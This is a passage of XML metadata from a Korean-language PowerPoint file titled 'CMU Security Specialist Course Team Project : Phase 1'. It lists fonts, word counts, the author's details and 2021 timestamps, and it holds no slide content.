                <a:schemeClr val="bg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2041</TotalTime>
  <Words>2020</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>703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HY목각파임B</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CMU Security Specialist Course  Team Project Phase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Security Specialist Course  Team Project : Phase 1</dc:title>
  <dc:creator>박병철/책임연구원/SW Platform(연)Advanced OS TP(byungchul.park@lge.com)</dc:creator>
  <cp:lastModifiedBy>박병철/책임연구원/SW Platform(연)Advanced OS TP(byungchul.park@lge.com)</cp:lastModifiedBy>
  <cp:revision>159</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-16T06:07:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-01T09:30:56Z</dcterms:modified>
</cp:coreProperties>
</file>